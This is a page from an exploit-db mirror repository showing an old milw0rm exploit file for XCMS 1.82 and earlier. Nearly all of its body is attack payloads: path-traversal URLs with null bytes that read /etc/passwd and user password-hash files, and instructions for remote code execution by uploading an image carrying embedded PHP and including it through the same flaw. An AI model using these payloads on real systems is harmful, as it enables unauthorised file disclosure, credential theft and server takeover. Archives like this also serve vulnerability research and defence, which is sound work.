bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/4802.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

20 lines
No EOL
757 B
Text
Raw Blame History

# _ __ _____ _____ _ __
# | '_ \ / _ \ \/ / _ \ '_ \
# | | | | __/> < __/ | | |
# |_| |_|\___/_/\_\___|_| |_|
# XCMS <= 1.82 LFI & RCE Xpl
# Nexen rocked this one ;)
# LFIs
http://127.0.0.1/xcms/index.php?pg=admin&s=../../../../../etc/passwd\0
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../../../../etc/passwd\0
# Hash disclosure
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../dati/membri/[username].dtb\0
# RCE:
Doing RCE is more difficult, you must have an image with a php code binded (you can use edjpgcom to do that)
now upload that image on your panel, and exploit rce trough lfi:
http://127.0.0.1/xcms/index.php?mod=[existing module]&pg=../../uploads/avatar/[your_username].jpg\0
# milw0rm.com [2007-12-28]
Reference in a new issue View git blame Copy permalink